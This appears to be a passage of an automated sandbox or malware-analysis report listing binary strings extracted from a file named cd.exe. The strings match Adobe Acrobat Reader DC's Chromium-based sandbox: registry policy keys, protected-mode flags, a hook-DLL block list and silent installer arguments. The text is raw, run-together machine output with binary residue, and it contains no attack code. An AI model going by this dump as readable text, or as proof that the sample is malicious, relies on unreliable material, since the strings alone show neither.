AppInitEvent/dllLoadbLTEnableDLLOptimizationAcroExe load doneSOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockdownDCAcrobat Reader_AcroAppTimeracrord32_super_sbx/if/ifpdfshell_prev/slModebAllowWindowCreationOnBrowserUseSandboxModalWndReparentingSoftware\Adobe\Acrobat Reader\DC\Privileged/slModeSoftware\Adobe\Acrobat Reader\DC\AVGeneraliSLExitTimeHighPartiSLExitTimeLowPartFatal ErrorAcrobat failed to load its Core DLLhttps://helpx.adobe.com/acrobat/kb/acrobat-failed-load-core-dll.htmlopen\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\AcroWinMainSandboxAcroviewR21\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\unordered_map/set too longinvalid hash bucket count
Source: cd.exe	Binary string: ONtCreateFile: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\filesystem_dispatcher.ccreal path: NtOpenFile: STATUS_ACCESS_DENIEDNtQueryAttributesFile: STATUS_ACCESS_DENIEDNtQueryFullAttributesFile: STATUS_ACCESS_DENIEDNtSetInformationFile: STATUS_ACCESS_DENIED\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\kernel32.dll
Source: cd.exe	Binary string: 4`@dI0nI 7H\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\CONTENTSCONTENTSAcrobat DocumentPDFCONTENTSLink Source DescriptorLink Source DescriptorObject DescriptorObject DescriptorEmbed SourceEmbed SourceLink SourceLink SourceEmbedded ObjectEmbedded ObjectCustom Link SourceCustom Link SourceObjectLinkObjectLinkCF_BITMAPCF_ENHMETAFILECF_METAFILEPICTCF_DIBNotesDocInfoNotesDocInfoNoteshNoteNoteshNoteLink Source DescriptorObject DescriptorEmbedded ObjectEmbed SourceCustom Link SourceLink SourceObjectLinkNotesDocInfoNoteshNoteAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib
Source: cd.exe	Binary string: zl`l@`l@aFPDFMOutlook.PDFMOutlookSubjectEntryID\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
Source: cd.exe	Binary string: \"}{\LogTransport2.exeLogTransport2.exeNOVALUE\verclsid.exeverclsid.exe/S/C/I/XIMEPADSV.EXEEmbeddingimjpuex.exeimjpdct.exeifSharedPathModulePathSOFTWARE\Microsoft\IMEJPSOFTWARE\Microsoft\IMEJP\%s\directories\ime\shared\acrotray.exe/Q\acrodist.exe--UseSystemFonts--EditSecurity-C:7--HWND:-J/E/N/P/J/O.pdf.psupdatepvbpreferencepersistmachineiddontsendcreatedumpsendlogsolutionurlopenadobetermsandconditionsopensolutionurldummy\CRWindowsClientService.exeSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Photoshop.exeSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Illustrator.execImageEditorcObjectEditorSOFTWARE\Classes\Applications\mspaint.exe\shell\edit\commandbEnableEditUsingacrobat_sbxSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad++.execJSEditorSOFTWARE\Classes\Applications\notepad.exe\shell\edit\commandD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\process_thread_dispatcher.ccexe name: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dll
Source: cd.exe	Binary string: AcroCEF\AcroCEF.exeAcroCEF.exeHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXT\Device\HarddiskVolumepipe\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\4202392~NtQueryObjectRtlNtStatusToDosErrorRtlCompareUnicodeString\Device\WinDFSA:CdmRedirectorVolume\Device\HarddiskVolumeDirectoryFileEventSectionKey<>:"\\|?*Software\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDownbEnableSameObjectCheckbSupportRDSUPDSYSTEM\CurrentControlSet\Control\Terminal Server\ClusterSettingsUvhdEnabledbFilePathPreprocessingShortcutEnabled
Source: cd.exe	Binary string: {l`l@`l@aF\??\\Device\x
Source: cd.exe	Binary string: \|l`l@`l@aFatlTraceGeneralatlTraceCOMatlTraceQI\??\atlTraceRegistrar\Device\\\?\UNC\atlTraceRefcount\??\UNC\/?/UNC/\?\UNC\atlTraceWindowing\??\pipe\\??\mailslot\\\?\atlTraceControls\\.\\\atlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPI%d.%u.%d/cr/bbEnforceReadRestrictionsSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownbEnableAlternateLaunchDesktopSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownbEnableAlternateTempDirectorySoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegedbEnableHeapMitigationsbEnableProcessIntegrityMitigationsbEnableEnhancedPolicyRestrictionsbEnableGlobalAtomRestrictionsbPreventCreatingExecutablesbEnableBinaryPlantingProtectionbDisableMultiplePrefetchiPMAppContainerStateSoftware\Adobe\Adobe Acrobat\DC\AVGeneraliSandboxExitCodeSoftware\Adobe\Adobe Acrobat\DC\AVGeneral\cSandboxLaunchFailureiOptionSelectediLastErrorValueiIsBrowserLaunchiIsCaptiveReaderLaunchiSandboxResultCodeiIsProtectedViewbIPMEnabledAppContainerpdfshell_prevbEnableStrictHandleCheckProtectionbEnableNonsystemFontRestrictionsbPVAppContainerFallback0x%XbEnableRemoteDllLoadRestrictionsbPMAppContainerFallbackiNumSessionsbEnableLowLabelDllLoadRestrictionsSoftware\Adobe\Adobe Acrobat\DC\AVGeneraliNumSessionsSoftware\Adobe\Adobe Acrobat\DC\AVGeneral\cSandboxLaunchFailure/if.Software\Adobe\Adobe Acrobat\DC\PrivilegedbEnableProtectedModeAppContainer/CRCoInitializeSecurity() failed, result=0xSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdown/if/mspiPMAppContainerLaunchFailureFallbackSandbox Process Initialization Failed - error:/CRDebugbEnableProtectedViewAppContainer/ICSbEnableProtectedModeAppContainerbIPMTurnedPMONbPMSandboxFallbackbProtectedModeFailed to create a security descriptor4057363MbAllowFallbackForAdminEnforcedSandbox/b/l/ifDbEnableAppContainerForDebuggingbEnableProtectedModeAppContainer/idBSoftware\Adobe\Adobe Acrobat\DC\PrivilegedbProtectedModeHandshake with Sandbox Process FailedD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cppbProtectedMode/CRNoRemoveD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cppbProtectedMode/CRInvalid DateTimeSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegediPVAppContainerLaunchFailureFallbackReleaseInvalid DateTimeSpanbEnableProtectedViewAppContainer/CR:bEnableProtectedViewWin32kLockdownD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cppMakeScopedAbsoluteSd() failedAcrobatAppIDD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cpp/bAcroCEF\AcroCEF.exeCLSIDD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cppUnknown process type/r/VAcroCEF\RdrCEF.exeRdrCEF.exeAcroCEF.exe
Source: cd.exe	Binary string: O\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dllkernel32.dll
Source: cd.exe	Binary string: cadialhk.dllacpiz.dllactivedetect32.dllactivedetect64.dllairfoilinject3.dllakinsofthook32.dllassistant_x64.dllatcuf64.dllavcuf64.dllavgrsstx.dllbabylonchromepi.dllbtkeyind.dllcmcsyshk.dllcmsetac.dllcooliris.dllcplushook.dlldockshellhook.dlleasyhook32.dlleasyhook64.dllesspd.dllgoogledesktopnetwork3.dllfwhook.dllguard64.dllhookprocesscreation.dllhookterminateapis.dllhookprintapis.dllimon.dllicatcdll.dllicdcnl.dllioloHL.dllkloehk.dlllawenforcer.dlllibdivx.dlllvprcinj01.dllmadchook.dllmdnsnsp.dllmoonsysh.dllmpk.dlln64hooks.dllnpdivx32.dllnpggNT.desnpggNT.dllnphooks.dlloawatch.dllpastali32.dllpavhook.dllpavlsphook.dllpavshook.dllpavshookwow.dllpctavhook.dllpctgmhk.dllpicrmi32.dllpicrmi64.dllprntrack.dllprochook.dllprotector.dllradhslib.dllradprlib.dllrapportnikko.dllrlhook.dllrooksdol.dllrndlpepperbrowserrecordhelper.dllrpchromebrowserrecordhelper.dllr3hook.dllsahook.dllsbrige.dllsc2hook.dllsdhook32.dllsguard.dllsmum32.dllsmumhook.dllssldivx.dllsyncor11.dllsystools.dlltfwah.dllwblind.dllwbhelp.dllwindowsapihookdll32.dllwindowsapihookdll64.dllwinstylerthemehelper.dllD:\B\T\Imports\Open\Chrome\Chrome\src\services\service_manager\sandbox\win\sandbox_win.ccCreateAppContainerProfileSandbox container for Acrobat Reader Protected ModeAdobe Acrobat Reader DC Protected ModeAdobe.AcrobatReaderDC.ProtectedMode\|bLTEnableConcurrencyInBrokerInit01DWSPY36.dll:1\|CwComijt.dll:1\|cscore.dll:1\|vozokopot.dll:1\|DreyeiMHook.dll:1\|Dev2Dl32.dll:1\|Nsccor01.dll:1\|nsccor03.dll:1\|DSTermPr.dll:1\|jesterrun0.dll:1\|DreyelMhook.dll:1\|druver.dll:1\|vpnlsp_x32.dll:1\|msnhook.dll:1\|hooker.dll:1\|pcsw.dll:1\|AntiExploitCore.dll:1\|netchatidle.dll:1tDllLoadPermtDllLoadPerm_Computeonly4220220S-1-15-2-3805855342-111495108-2588610986-3809954156-747251120-2599371852-2534338891policy error:acrobat.dll\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\RtlInitUnicodeStringntdll.dll\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
Source: cd.exe	Binary string: NUnknownDefaultNtCreateFileNtOpenFileNtQueryAttributesFileNtQueryFullAttributesFileCreateNamedPipeWNtOpenThreadNtOpenProcessNtOpenProcessTokenNtOpenProcessTokenExCreateProcessWNtCreateKeyNtOpenKeyCreateThreadNtCreateSectioncompute-only-brokercompute-only-rendereripc-co-channelipc-rdr-channeltyperenderershell-broker-channelipc-cef-channellocaleservice-sandbox-typenonenone_and_elevatednetworkppapiutilitycdmprint_compositoraudiosharing_servicespeech_recognitionvideo_capturepdf_conversionproxy_resolverxr_compositingallow-no-sandbox-joballow-sandbox-debuggingdisable-gpu-sandboxdisable-namespace-sandboxdisable-seccomp-filter-sandboxdisable-setuid-sandboxdisable-win32k-lockdownenable-audio-service-sandboxgpu-sandbox-allow-sysv-shmgpu-sandbox-failures-fatalno-sandboxallow-third-party-modulesadd-gpu-appcontainer-capsno-sandbox-and-elevatedadd-xr-appcontainer-capsgpu-processnacl-brokernacl-loaderppapi-brokerppapiutilityservicezygotentdll.dll\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\@
Source: cd.exe	Binary string: A\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ControlH1`@dI0nIPdI\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SystemTopicsSysItemsSystemFormatsCF_TEXTStatusReadyHelpYou are connected to Adobe Acrobat.ReturnMessage 2`@dI0nI 7Hp2`
Source: cd.exe	Binary string: GCreateEvent: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\sync_dispatcher.ccOpenEvent: STATUS_ACCESS_DENIEDConsider modifying policy using these policy rules: EVENTS_ALLOW_ANY\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
Source: cd.exe	Binary string: H\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\IsWow64Process2SetDefaultDllDirectoriesSetProcessMitigationPolicy\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtSetInformationProcesssecurity descriptor - error:D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\target_process.ccCreateProcessAsUserW failed to create sandbox process - error:job object - error:set thread token - error:g_shared_sectiong_shared_IPC_sizeg_shared_policy_size\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F]#B
Source: cd.exe	Binary string: >`\Device\FileInfo%s%s%c:Superfetchinfo: %x Data: %x
Source: cd.exe	Binary string: 3`@gI84`pfI\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
Source: cd.exe	Binary string: cCZECSYGREELLSUOFINPOLPLKRUMROMTURTRKMNGMONESPESN\Locale\\brdlang32.Software\Adobe\Adobe Acrobat\DC\Language\current\brdlang32SYSTEM\CurrentControlSet\Control\FileSystemLongPathsEnabled\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\`
Source: cd.exe	Binary string: cnullbooleanintegerdoublestringbinarydictionarylist\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
Source: cd.exe	Binary string: :Zone.Identifierfeatmonitorapp.exeIPTip_Main_WindowSoftware\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer32%CommonProgramFiles%CommonProgramW6432Software\Adobe\Adobe Acrobat\DC\AVGeneralbProtectedModebHasAcrobatConsentDCSoftware\Adobe\Acrobat Reader\DC\PrivilegedContinuous.lnk\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SeChangeNotifyPrivilegeS:(ML;;;;;)S-1-16-16384S-1-16-12288S-1-16-8192S-1-16-6144S-1-16-4096S-1-16-2048S-1-16-0NtCreateLowBoxToken\Sessions\%d\AppContainerNamedObjects\%lsNtCreateDirectoryObject\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F] F] F] F] F] F] F] F] F] F] F] F] F] F]0
Source: cd.exe	Binary string: IDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsHandleAcroURLAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\list too longatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistrar_pptExport.emfatlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceException.tmp.pdfatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPICount
Source: cd.exe	Binary string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Reader /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplication{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\.0DC\InstallerENU_GUIDPATHInstallLocationAcroExch.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\NotificationAppxSOFTWARE\Adobe\Acrobat Reader\\DC\SOFTWARE\Adobe\Acrobat Reader\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 /qn/i msiexec.exe ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn/i msiexec.exeAppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstoreAdobe Reader XIRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrd
Source: cd.exe	Binary string: Gbad array new lengthmap/set too longstring too longVersionMajor{AC76BA86-0000-0000-7760-7E8A45000000}InstallLocationAcrobat\Acrobat.exeiEntitlementLevelbLoginStatusTrunkBetaDC\AVEntitlementSOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorVersionMinorInstallLocationAcrobat\Acrobat.exe#32770Learn MoreOkMsgBoxHookMsgBoxHookMsgBoxHookMsgBoxHook0x%XS:(ML;;NW;;;LW)rdrCEF_alternate_desktop_alr_alternate_desktop_rdrCEF_alternate_desktop_alr_alternate_desktop_\S-1-16-4096S:(ML;CIOI;NW;;;LW)TMP=TMP=TEMP=TEMP=LOCALAPPDATA=LOCALAPPDATA===invalid string positionvector too longSOFTWARE\Adobe\Adobe Acrobat\DC\Installer\bIsSingleClientAppbIsSCAcroAppInstalledSCAPackageLevelIsAcrInstalledInRdrModeSeShutdownPrivilegekernel32.dllGetNamedPipeServerProcessIdGetNamedPipeClientProcessIdS:(ML;;NW;;;LW)D:P(D;;GA;;;NU)(D;;GA;;;AN)(A;;GA;;;)(A;;GA;;;AC)\\.\pipe\AIPC_SRV\\\.\pipe\AIPC_CLI\Global\IEACROBATSTARTIPCNAMEDPIPECOMGlobal\ARM Update MutexGlobal\Acro Update MutexC:\thsnYaVieBodaTsnIorcAeBoda\\.\pipe\32B6B37A-4A7D-4e00-95F2-6F0BF3DE3E00SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDownbEnableEventViewerLoggingSoftware\Adobe\Acrobat Reader\DC\PrivilegedbEnableEventViewerLoggingAdobe ReaderDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsHandleAcroURLAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\list too long4057363broker_pdfshell_sh/if/id %uAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Software\Adobe\Acrobat Reader\DC\FeatureStateSoftware\Adobe\Adobe Acrobat\DC\FeatureStateatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClient\??\\Device\atlTraceDBProvider\\?\UNC\\??\UNC\/?/UNC/atlTraceSnapin\?\UNC\\??\pipe\\??\mailslot\atlTraceNotImpl\\?\\\.\\\atlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPIAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib%d.%u.%d/cr/bSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownbEnforceReadRestrictionsSOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockdownbEnableAlternateLaunchDesktopSoftware\Adobe\Adobe
Source: cd.exe	Binary string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplicationSOFTWARE\Adobe\Adobe Acrobat\{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0DC\InstallerENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\RDCNotificationAppx\ADCNotificationAppx\NotificationAppxSOFTWARE\Adobe\Adobe Acrobat\\DC\SOFTWARE\Adobe\Adobe Acrobat\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 IS_COEX_REPAIR=1 /qn/i msiexec.exe/i AppDoNotTakePDFOwnershipAtLaunch ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qnmsiexec.exeAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Dev
